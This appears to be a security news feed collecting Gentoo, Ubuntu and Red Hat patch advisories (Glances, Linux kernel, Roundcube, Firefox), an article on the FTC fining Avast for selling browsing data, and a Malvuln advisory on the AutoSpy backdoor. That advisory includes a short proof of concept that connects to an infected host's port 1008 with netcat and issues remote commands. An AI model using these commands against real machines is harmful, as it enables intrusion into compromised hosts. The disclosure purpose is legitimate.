Gentoo Linux Security Advisory 202402-30 - A vulnerability has been found in Glances which may lead to arbitrary code execution. Versions greater than or equal to 3.1.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Glances: Arbitrary Code Execution  
     Date: February 26, 2024  
     Bugs: #791565  
       ID: 202402-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Glances which may lead to arbitrary  
code execution.

Background  
==========

Glances is an open-source system cross-platform monitoring tool. It  
allows real-time monitoring of various aspects of your system such as  
CPU, memory, disk, network usage etc.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
sys-process/glances  < 3.1.7       >= 3.1.7

Description  
===========

A vulnerability in XML parsing may lead to a variety of XML attacks.

Impact  
======

A vulnerability in XML parsing may lead to a variety of XML attacks.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Glances users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-process/glances-3.1.7"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-30

Ubuntu Security Notice 6651-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6651-1February 23, 2024linux, linux-aws, linux-gcp, linux-hwe-6.5, linux-laptop, linux-oracle,linux-raspi, linux-starfive vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-laptop: Linux kernel for Lenovo X13s ARM laptops- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-starfive: Linux kernel for StarFive processors- linux-hwe-6.5: Linux hardware enablement (HWE) kernelDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-6915)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Jann Horn discovered that the io_uring subsystem in the Linux kernel didnot properly handle the release of certain buffer rings. A local attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2024-0582)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   linux-image-6.5.0-1008-starfive  6.5.0-1008.9   linux-image-6.5.0-1010-laptop   6.5.0-1010.13   linux-image-6.5.0-1011-raspi    6.5.0-1011.14   linux-image-6.5.0-1014-aws      6.5.0-1014.14   linux-image-6.5.0-1014-gcp      6.5.0-1014.14   linux-image-6.5.0-1016-oracle   6.5.0-1016.16   linux-image-6.5.0-21-generic    6.5.0-21.21   linux-image-6.5.0-21-generic-64k  6.5.0-21.21   linux-image-aws                 6.5.0.1014.14   linux-image-gcp                 6.5.0.1014.14   linux-image-generic             6.5.0.21.20   linux-image-generic-64k         6.5.0.21.20   linux-image-generic-lpae        6.5.0.21.20   linux-image-kvm                 6.5.0.21.20   linux-image-laptop-23.10        6.5.0.1010.13   linux-image-oracle              6.5.0.1016.16   linux-image-raspi               6.5.0.1011.12   linux-image-raspi-nolpae        6.5.0.1011.12   linux-image-starfive            6.5.0.1008.10   linux-image-virtual             6.5.0.21.20Ubuntu 22.04 LTS:   linux-image-6.5.0-21-generic    6.5.0-21.21~22.04.1   linux-image-6.5.0-21-generic-64k  6.5.0-21.21~22.04.1   linux-image-generic-64k-hwe-22.04  6.5.0.21.21~22.04.11   linux-image-generic-hwe-22.04   6.5.0.21.21~22.04.11   linux-image-virtual-hwe-22.04   6.5.0.21.21~22.04.11After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6651-1   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,   CVE-2024-0582, CVE-2024-0646Package Information:   https://launchpad.net/ubuntu/+source/linux/6.5.0-21.21   https://launchpad.net/ubuntu/+source/linux-aws/6.5.0-1014.14   https://launchpad.net/ubuntu/+source/linux-gcp/6.5.0-1014.14   https://launchpad.net/ubuntu/+source/linux-laptop/6.5.0-1010.13   https://launchpad.net/ubuntu/+source/linux-oracle/6.5.0-1016.16   https://launchpad.net/ubuntu/+source/linux-raspi/6.5.0-1011.14   https://launchpad.net/ubuntu/+source/linux-starfive/6.5.0-1008.9   https://launchpad.net/ubuntu/+source/linux-hwe-6.5/6.5.0-21.21~22.04.1

Ubuntu Security Notice USN-6651-1

Ubuntu Security Notice 6654-1 - It was discovered that Roundcube Webmail incorrectly sanitized characters in the linkrefs text messages. An attacker could possibly use this issue to execute a cross-site scripting attack.

==========================================================================  
Ubuntu Security Notice USN-6654-1  
February 26, 2024

roundcube vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Roundcube Webmail could allow cross-site scripting (XSS) attacks.

Software Description:  
- roundcube: skinnable AJAX based webmail solution for IMAP servers

Details:

It was discovered that Roundcube Webmail incorrectly sanitized characters  
in the linkrefs text messages. An attacker could possibly use this issue to  
execute a cross-site scripting (XSS) attack. (CVE-2023-43770)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  roundcube                       1.6.2+dfsg-1ubuntu0.1  
  roundcube-core                  1.6.2+dfsg-1ubuntu0.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.5.0+dfsg.1-2ubuntu0.1~esm2  
  roundcube-core                  1.5.0+dfsg.1-2ubuntu0.1~esm2

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.4.3+dfsg.1-1ubuntu0.1~esm3  
  roundcube-core                  1.4.3+dfsg.1-1ubuntu0.1~esm3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.3.6+dfsg.1-1ubuntu0.1~esm3  
  roundcube-core                  1.3.6+dfsg.1-1ubuntu0.1~esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.2~beta+dfsg.1-0ubuntu1+esm3  
  roundcube-core                  1.2~beta+dfsg.1-0ubuntu1+esm3

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6654-1  
  CVE-2023-43770

Package Information:  
  https://launchpad.net/ubuntu/+source/roundcube/1.6.2+dfsg-1ubuntu0.1

Ubuntu Security Notice USN-6654-1

By Deeba Ahmed
Avast Hit with $16.5 Million Fine, Settles with FTC Over Deceptive Data Practices, Forced to Delete User Information
This is a post from HackRead.com Read the original post: Avast Fined Millions for Selling User Browsing Data

Avast, a popular antivirus software, has been fined $16.5 million for selling user browsing data despite claims of protecting privacy. The FTC accused them of misleading users and selling sensitive information without consent. Avast agreed to settle, stop selling data, and delete user information.

The US Federal Trade Commission (FTC) has imposed a $16.5 million fine on Avast Limited, **Avast Software,** and Jumpshot for deceiving users by claiming its software would eliminate web tracking but doing the tracking itself.

It is worth noting that, the Prague, Czech Republic-based anti-malware and cybersecurity vendor stored the data indefinitely and sold it without consumers’ consent or notice while promising users exemplary privacy protection.

This development reflects the continuation of the FTC’s crackdown on companies involved in deceptive data privacy practices. In January 2024, it reached a **settlement** with Outlogic to prevent selling information for tracking user locations and **banned** InMarket from selling precise user locations.

The FTC’s Director of Consumer Protection, Samuel Levine, criticized Avast’s bait-and-switch surveillance tactics for violating consumer privacy.

In its complaint, available **here** (PDF), the FTC revealed that cybersecurity software company Avast collected consumers’ browsing information through its browser extensions and antivirus software, including Avast Extensions, Avast Secure Browser, Avast Mobile Software, and Avast Desktop Software. The FTC accused Avast of selling its data to over 100 third parties via Jumpshot.

For your information, in 2013, Avast acquired competitor Jumpshot, rebranded as an analytics company, and sold browsing information collected from consumers from 2014 to 2020 through it. The FTC accused Jumpshot of offering products that enabled user tracking and associating browsing histories with third-party information.

Jumpshot entered a contract with Omnicom, offering an “All Clicks Feed” for 50% of customers in the US, UK, Mexico, Australia, Canada, and Germany, and earned millions in gross revenues. Avast’s dubious data privacy practices were exposed in 2020 in a joint investigation, leading to the **shutdown of Jumpshot**.

Reportedly, the company collected data on religious beliefs, health concerns, political views, locations, and financial status from 2014 to 2020. The FTC found Avast failed to adequately anonymize browsing information despite the company claiming otherwise.

FTC also discovered that Avast sold data with unique identifiers for each browser, which exposed crucial data like visited websites, timestamps, user location, and the type of device and browser.

Avast agreed to settle the case with the FTC, paying $16.5 million. The order also requires Avast to stop selling or licensing browsing data to advertisers, delete all data obtained by Jumpshot, and notify affected customers of the sale.

How Jumpshot functioned

Avast’s spokesperson, Jeff Monney, reaffirmed the company’s commitment to protecting and empowering users’ digital lives, citing disagreement on the allegations while opting for a settlement.

Data privacy violations can lead to significant financial consequences for companies like Avast, including fines, lawsuits, lost business, reputational damage, and negative press coverage. Regulatory bodies enforce data privacy laws and can sue companies, resulting in further financial losses and legal costs, as evident in Avast’s case.

****RELATED ARTICLES****

1.  **HelloFresh Fined £140,000 for 80 Million Spam Messages**
2.  **Unreleased Music Stolen and Sold on Dark Web: Hacker Fined**
3.  **Google Incognito Mode: New Disclaimer Reveals Data Tracking**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data**
6.  **Apple and Samsung fined millions for slowing down old smartphones**

Avast Fined Millions for Selling User Browsing Data

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Red Hat Security Advisory 2024-0976-03 - An update for firefox is now available for Red Hat Enterprise Linux 7. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0976.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0976-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0976  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0976-03

Red Hat Security Advisory 2024-0972-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0972-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0972  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0972-03

Red Hat Security Advisory 2024-0971-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0971.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0971-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0971  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0971-03

Red Hat Security Advisory 2024-0970-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0970.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0970-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0970  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0970-03

Red Hat Security Advisory 2024-0969-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0969.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0969-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0969  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Tag

#web